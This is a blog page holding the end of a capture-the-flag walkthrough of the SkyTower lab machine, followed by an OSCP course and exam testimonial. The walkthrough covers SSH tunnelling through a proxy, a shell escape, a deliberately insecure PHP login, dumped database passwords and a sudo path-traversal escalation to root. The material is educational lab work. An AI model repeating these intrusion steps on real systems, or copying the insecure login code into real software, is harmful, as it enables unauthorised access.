<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2uxpzfOS9aaflwBjcBiYfsakxDq8EoSPGTG6A4NQZ4n2dR8Tpd2JNFI7pao0SepuB4XhLOLjFe4b7f4h-v8MfvDNEQThGT1EiBIpe1qEnkOLb4cO3Vq1oR8uywSuJUp5KnheUw8E_OvlA/s1600/Screenshot+from+2015-05-28+23%253A28%253A26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2uxpzfOS9aaflwBjcBiYfsakxDq8EoSPGTG6A4NQZ4n2dR8Tpd2JNFI7pao0SepuB4XhLOLjFe4b7f4h-v8MfvDNEQThGT1EiBIpe1qEnkOLb4cO3Vq1oR8uywSuJUp5KnheUw8E_OvlA/s400/Screenshot+from+2015-05-28+23%253A28%253A26.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Ignoring
the filtered status of port 22, I attempted an unsuccessful
connection:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7rKM9i8YdRbnRRj8aSLjRBWxvnI8NBRk9YrMohHVpSUlG3DMwUCeu9OZedlCRlkMqCCXNCNYOKwS6HA6_qS3IbbOngHlfSelJMb-D4Ot6tmlZM6760MQnfhrPd11ZYTC0GfRg04KnnerN/s1600/Screenshot+from+2015-05-28+23%253A34%253A47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7rKM9i8YdRbnRRj8aSLjRBWxvnI8NBRk9YrMohHVpSUlG3DMwUCeu9OZedlCRlkMqCCXNCNYOKwS6HA6_qS3IbbOngHlfSelJMb-D4Ot6tmlZM6760MQnfhrPd11ZYTC0GfRg04KnnerN/s400/Screenshot+from+2015-05-28+23%253A34%253A47.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Taking
the Squid http proxy approach, I decided to attempt to connect using
Proxychains. I'd recently performed a similar hack in the Offensive
Security OSCP lab, so it wasn't totally foregin to me. I modified
/etc/proxychains.conf to connect to the victim machine on port 3189.</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidcXkF_vnYwyLZR6PfsjOXYaj1ILKltk0o1OGTmJwV1KMVuVIpyh5O3DTcIBqLNt9X9HtqVKIHY7omDNpckiZsudBY0wPfhP3ZJ72MU3YZTZFfgxhI80iYgbqSc3xHCFxKo9RWUEhhQemt/s1600/Screenshot+from+2015-05-28+23%253A50%253A13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidcXkF_vnYwyLZR6PfsjOXYaj1ILKltk0o1OGTmJwV1KMVuVIpyh5O3DTcIBqLNt9X9HtqVKIHY7omDNpckiZsudBY0wPfhP3ZJ72MU3YZTZFfgxhI80iYgbqSc3xHCFxKo9RWUEhhQemt/s1600/Screenshot+from+2015-05-28+23%253A50%253A13.png" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Proxychains
was able to successfully connect on the machine's ssh port using the
obtained credentials:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">root@kali:~# proxychains ssh john@10.1.1.7<br />
ProxyChains-3.1
(http://proxychains.sf.net)<br />
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK<br />
The
authenticity of host '10.1.1.7 (10.1.1.7)' can't be
established.<br />
ECDSA key fingerprint is
f6:3b:95:46:6e:a7:0f:72:1a:67:9e:9b:8a:48:5e:3d.<br />
Are you sure
you want to continue connecting (yes/no)? yes<br />
Warning:
Permanently added '10.1.1.7' (ECDSA) to the list of known
hosts.<br />
john@10.1.1.7's password: <br />
Linux SkyTower
3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64<br />
<br />
The programs
included with the Debian GNU/Linux system are free software;<br />
the
exact distribution terms for each program are described in
the<br />
individual files in /usr/share/doc/*/copyright.<br />
<br />
Debian
GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the
extent<br />
permitted by applicable law.<br />
Last login: Fri Jun 20
07:41:08 2014<br />
<br />
Funds have been withdrawn<br />
Connection to
10.1.1.7 closed.<br />
root@kali:~# <br />
<br />
<br /></td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Upon
connection the session closes immediately, however I was able to
execute commands over ssh. </span></span></span></span></span></span><span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">With
this ability I could further system enumeration, attempt to execute a
revershell, try to escape the shell that keeps shutdown upon
connection, etc....</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Issuing
an “/bin/sh -i” command, I was able to get a more peristent
shell, but it not have “job control”. Afraid that this would
restrict something I wanted to do, I opted to modify the .bashrc file
in John's home directory:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">ProxyChains-3.1
(http://proxychains.sf.net)<br />
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK<br />
john@10.1.1.7's
password: <br />
total 24<br />
drwx------ 2 john john 4096 Jun 20 2014
.<br />
drwxr-xr-x 5 root root 4096 Jun 20 2014 ..<br />
-rw------- 1
john john 7 Jun 20 2014 .bash_history<br />
-rw-r--r-- 1 john john
220 Jun 20 2014 .bash_logout<br />
-rw-r--r-- 1 john john 3437 Jun 20
2014 .bashrc<br />
-rw-r--r-- 1 john john 675 Jun 20 2014 .profile</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">I
simple renamed the .bashrc file to break its influence on my session.</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">root@kali:~# proxychains ssh john@10.1.1.7 "mv .bashrc
bashrc.bak"<br />
ProxyChains-3.1
(http://proxychains.sf.net)<br />
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK<br />
john@10.1.1.7's
password:
</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Finally
got a solid shell:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">ProxyChains-3.1
(http://proxychains.sf.net)<br />
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK<br />
john@10.1.1.7's
password: <br />
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2
x86_64<br />
<br />
The programs included with the Debian GNU/Linux
system are free software;<br />
the exact distribution terms for each
program are described in the<br />
individual files in
/usr/share/doc/*/copyright.<br />
<br />
Debian GNU/Linux comes with
ABSOLUTELY NO WARRANTY, to the extent<br />
permitted by applicable
law.<br />
Last login: Thu May 28 23:52:47 2015 from
10.1.1.7<br />
john@SkyTower:~$
</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Poking
around on the system I took a look in the login.php file and found
hardcoded mysql db credentials:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3lb8DvJ_7TRxtlXPmi-rrjUGp1tIfUgBYckNzoaUKU5gIQA5LhyphenhyphenJWsJTnIcbaJkpKauTISdWc9SVhm_zIif4oSTA_JpY_WHtNxc0ZMZCF9eMQpH_2Os5x_wlk9ZMlt1m9Pb_VBEo8WYwv/s1600/Screenshot+from+2015-05-29+00%253A33%253A06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3lb8DvJ_7TRxtlXPmi-rrjUGp1tIfUgBYckNzoaUKU5gIQA5LhyphenhyphenJWsJTnIcbaJkpKauTISdWc9SVhm_zIif4oSTA_JpY_WHtNxc0ZMZCF9eMQpH_2Os5x_wlk9ZMlt1m9Pb_VBEo8WYwv/s400/Screenshot+from+2015-05-29+00%253A33%253A06.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">I
also found the pesky culprit behind our Sql Injection auth bypass
issues:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">$sqlinjection = array("SELECT", "TRUE",
"FALSE", "--","OR", "=",
",", "AND", "NOT");<br />
$email =
str_ireplace($sqlinjection, "",
$_POST['email']);<br />
$password = str_ireplace($sqlinjection, "",
$_POST['password']);<br />
<br />
$sql= "SELECT * FROM login where
email='".$email."' and
password='".$password."';";<br />
$result =
$db->query($sql);</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Using
the db credentials, I was able to login to the db and extract
additionaldb credentials:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">john@SkyTower:/var/www$ mysql --user=root --password=root
SkyTech<br />
Reading table information for completion of table and
column names<br />
You can turn off this feature to get a quicker
startup with -A<br />
<br />
Welcome to the MySQL monitor. Commands
end with ; or \g.<br />
Your MySQL connection id is 2288<br />
Server
version: 5.5.35-0+wheezy1 (Debian)<br />
<br />
Copyright (c) 2000,
2013, Oracle and/or its affiliates. All rights reserved.<br />
<br />
Oracle
is a registered trademark of Oracle Corporation and/or
its<br />
affiliates. Other names may be trademarks of their
respective<br />
owners.<br />
<br />
Type 'help;' or '\h' for help. Type
'\c' to clear the current input statement.<br />
<br />
mysql>
<br />
<br />
<br />
-----------------------------------------------------------------------------------------------------------------------------------------------<br />
<br />
mysql>
use SkyTech;<br />
Database changed<br />
<br />
mysql> select * from
login;<br />
+----+---------------------+--------------+<br />
| id |
email | password |<br />
+----+---------------------+--------------+<br />
|
1 | john@skytech.com | hereisjohn |<br />
| 2 | sara@skytech.com |
ihatethisjob |<br />
| 3 | william@skytech.com | senseable
|<br />
+----+---------------------+--------------+<br />
3 rows in set
(0.00 sec)<br />
<br />
mysql>
</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Giving
the db username and passwords a try for system login worked out for
me. I was able to login as sara who had limited sudo access to list
and cat a couple of root directories. I </span></span></span></span></span></span><span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">in
turn</span></span></span></span></span></span><span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">
used this access to include </span></span></span></span></span></span><span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">the
listing of the root home directory and using cat to open the
flag.txt file.</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">sara@SkyTower:~$ sudo ls
/accounts/../root/<br />
flag.txt<br />
sara@SkyTower:~$ sudo cat
/accounts/../root/flag.txt<br />
Congratz, have a cold one to
celebrate!<br />
root password is theskytower<br />
<br />
<br />
sara@SkyTower:~$ su root<br />
Password: <br />
root@SkyTower:~#
</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">W</span></span></span></span></span></span><span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">e'll
that's all for this one. I really enjoyed this challenge. I'll keep
my eyes open for more from the folks at TeleSpace Systems.</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<br />
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: 12pt;">Court
Graham, signing off....</span></span></span></div>
</div>
Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-63189539705263864632015-05-27T22:13:00.000-04:002015-05-27T22:13:08.877-04:00Offensive Security PWK Course and Exam Testimonial<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9qBj-qdVGQ1LloRVaTUdFoTjq_4ilzMZ9tgdd3MI8vw4b_IXtPsVz60mWdjTrHE4bGyZrQZ1yqBnTcGNxJu_qtGR8H1iYyZO9q3oo6RY0vdY7HHNsmVbge0qcruyMxeecqQgz_7PMtWg4/s1600/ocsp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9qBj-qdVGQ1LloRVaTUdFoTjq_4ilzMZ9tgdd3MI8vw4b_IXtPsVz60mWdjTrHE4bGyZrQZ1yqBnTcGNxJu_qtGR8H1iYyZO9q3oo6RY0vdY7HHNsmVbge0qcruyMxeecqQgz_7PMtWg4/s400/ocsp.jpg" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
I recently completed
the Penetration Testing with Kali Linux course and successfully
passed the Offensive Security Certified Professional Exam. However,
the path to success was not without its hurdles. I'm writing this
course/exam review to paint a picture of what to expect, as well as
shine some light on the mental preparation necessary.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
If you are reading
this review, I'm just about certain that you know the all about the
registration process, course syllabus, video and printed material
format, hands on lab environment and examination process. If not
please refer to the <a href="https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/">Offensive
Security training and certification websites</a>.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
As many of
prospective students of the course, I have a full basket of life
responsibilities including but not limited to a full time job as an
information security professional, a husband, father of 3 boys, a 1
hour commute to and from the office, and an infinite honey do list.
With those responsibilities alone you may be wonder when I would have
time to time to take on this sort of certification challenge. The
short answer is you'll need to cut into you normal sleep hours.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
I've broken down my
training, lab and exam rants into a list of numbered per-conceptions,
mis-conceptions, and suggestions:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<b>Course &
Exercise</b><b>s</b>
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<ol>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>The PWK
Course Covers all topics necessary for the exam</b> – I believe
this statement to be true, but however make sure to study the
theories and research the topics on your own. Use both the exercises
and lab time to make the practical application of each topic second
nature.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
</li>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>You have to
complete and submit all of the completed exercises in order to
register for the exam</b> – This is not true. The Offensive
Security Staff will definitely not impose such restrictions on the
student. You'll soon find out how much the responsibility is on you
to make sure you are ready. Don't take this as an opportunity to not
complete the exercises, they're there for a reason.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
</li>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>You can
study by reviewing videos and the documentation and do not require
lab time</b> – This is partially true. I'll explain; Depending the
time that you can invest (Daily/Nightly) the initial lab time may
only be lightly utilized. Without giving too much away, the early
portion of the training is centered around enumeration, both WAN,
LAN, and system; this is for good reason. With that said you'll be
able to sharpen these skills in the lab, but this will not require
the amount of time that you'll have to invest later in the course.
If you find that you initial lab time is running short don't panic,
continue to take the necessary time to study the contents in from
the videos and printed material.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<b>Don't hesitate
to purchase more lab time if necessary!</b></div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<b>The Lab
Environment </b>
</div>
</li>
</ol>
<div style="line-height: 100%; margin-bottom: 0in; text-indent: -0.25in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
The PWK Lab
Environment consist of approximately 50 machines which span 3
different networks. This is a true playground for the security
enthusiast. The degree of difficulty varies from one machine to the
next.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<ol>
<li><div style="line-height: 100%; margin-bottom: 0in;">
Y<b>ou do not
have to compromise all 50 machines</b> – As mentioned in my
previous point, it is your responsibility to best prepare your self
for the OSCP exam. These machines are priceless in the pursuit of
preparation, but its easy to loose focus and forget about the
primary goal, the OSCP certification. You can always purchase lab
time with the intent on owning all of the machines if that's your
desire.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
</li>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>Regulate the
amount of lab assistance you receive</b> – If utilized, the lab
and the associated freenode #offsec irc channel, serve as a great
resource to communicate with your peers and the Offensive Security
administrators. The Offsec admins are wise and will not give you too
much information. The prize is truly in the pursuit, they're aware
of this and will not hesitate to tell you to “Try Harder”.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<b>Resist the
temptation to turn to your peers for too much guidance; it will hurt
you in the long run!</b></div>
</li>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b style="line-height: 100%;">Take
detailed notes during your lab conquest</b><span style="line-height: 100%;"> – This detailed note
taking process will come in handy, as during the exam you will
doubtingly wonder “How did I perform that one exploit, what was
the syntax of that one command?” Your notes will save you time and
serve as a great study resource even when you are not online.
Keepnote which is available on your Kali Linux image is in my
opinion the best tool for note keeping.</span></div>
</li>
</ol>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<b>The Exam</b></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0in;">
I have taken countless IT and Security Certifications throughout my
career, I have never failed in any attempt; until now......</div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0in;">
I don't say this to scare or discourage anyone. First off, there is
no such thing as failure; just continued opportunities for learning.
Corny but true..</div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0in;">
Actually, the third time was a Charm. I know how did that happen, let
me tell you how so you can avoid the same mistakes, believe me its
possible!</div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="font-weight: normal; line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
As you all know,
you have approximately 24 hours to complete the required exam
objectives which are communicated to you the day of the exam via
email. You'll have a certain number of machines with associated
scored objectives. Achieving these objectives while documenting your
process and proof will give you a passing score. Once achieved you
must submit the penetration test report to Offsec for evaluation
(Pass/Fail).
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
Ok, now here some
do's and dont's:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<ul>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>Do not allow
your eyes to deceive you</b> – You have just completed countless
hours of theory and practical application of the required techniques
necessary to pass the exam, better yet own the box at hand! “Avoid
losing focus of the trees for the forest...” Don't worry about
passing the exam until you're done with the last box. The thought
and desire to pass can be distracting.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
If you see a
certain vulnerability, trust in your training, <b>if its looks like
chicken, tastes like chicken, its probably chicken!</b>
</div>
</li>
</ul>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKHA36TX-A29KxiZxHWJ1qIx-wRcrD1PFH3HSGfQaXh8wW1OlTwKB1nEb3oi6ggj96hRiDsZrMBhrcbQbQaAjyuo75kfUW3PpU0JrP-39GhLjGRwvaWvaN9TVLkC1hGhv76L6Ch_8o7vF1/s1600/chicken.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKHA36TX-A29KxiZxHWJ1qIx-wRcrD1PFH3HSGfQaXh8wW1OlTwKB1nEb3oi6ggj96hRiDsZrMBhrcbQbQaAjyuo75kfUW3PpU0JrP-39GhLjGRwvaWvaN9TVLkC1hGhv76L6Ch_8o7vF1/s320/chicken.jpg" width="320" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<ul>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
This was culprit
during my first attempt, don't over think during the challenge you
know how to do this stuff. Don't let the subtle differences between
the lab and exam throw you for a loop, use what you've been trained.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>Prepare
exploits and a list of go-to commands prior to the test </b>– Yes,
you'll have you course materials at your disposal during the exam,
but you will not want to flip through pages or take the time to
watch videos during the exam. Trust me <i><b>its the shortest
24hours of your life</b></i>. I created a spreadsheet which I'll
refine and post for download, that I call my Warchess. It contains
the step by step stack-based buffer overflow exploitation process as
Taught in the Offsec training; I was able to use this to make sure I
hadn't missed any necessary steps, Common commands, Shell escape
sequences, Netcat, Python, Perl, bind and reverse shell syntax, and
a list of my per-compiled Linux and Windows remote and local
exploits.</div>
</li>
</ul>
<ul>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>Get plenty
of rest</b> – This was partially the culprit during my second
attempt. My anticipation for the exam would not allow me to sleep
well the night before. I got 3 hours of sleep in total. Ultimately I
knew how to achieve success, but did not have the energy and mental
fortitude.</div>
</li>
</ul>
<ul>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>Download and
Practice vulnerable applications to exploit </b>– The exploit-db
has several exploits publicized Remote Buffer Overflow exploits
which have down loadable links to the vulnerable applications for
your own P.O.Cs. Do this, master these exploits and all the
curveballs prior to potentially seeing them during the exam.
</div>
</li>
</ul>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjno8eDUwHJOL0PgRTp4cvmHh6xWT4ARm2Ybox70jgtBXhX7llfhlCwwGOx6hhFArPv7dCbEhe3zmE5i1fQ66ndCPYCVZa6oXmr4_CShfOgKZ8dD5eJgRuQSZCeOvhNfsJhy-nzdDYSh-tf/s1600/Screenshot+from+2015-05-27+21%253A20%253A36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="25" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjno8eDUwHJOL0PgRTp4cvmHh6xWT4ARm2Ybox70jgtBXhX7llfhlCwwGOx6hhFArPv7dCbEhe3zmE5i1fQ66ndCPYCVZa6oXmr4_CShfOgKZ8dD5eJgRuQSZCeOvhNfsJhy-nzdDYSh-tf/s400/Screenshot+from+2015-05-27+21%253A20%253A36.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<ul>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<li><div style="line-height: 100%; margin-bottom: 0in;">
<b>Take
frequent breaks</b> – I know this is on allot of posts, however,
do not ignore this. Sitting in one place and concentrating on the
exam can be extremely stressful on the body. Make sure you stretch
and keep the blood circulating. Also, you mind will benefit from
switching gears.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
So in summary, I
made a couple fatal mistakes.
</div>
</li>
<li><div style="line-height: 100%; margin-bottom: 0in;">
Not following
through with known exploits from the training</div>
</li>
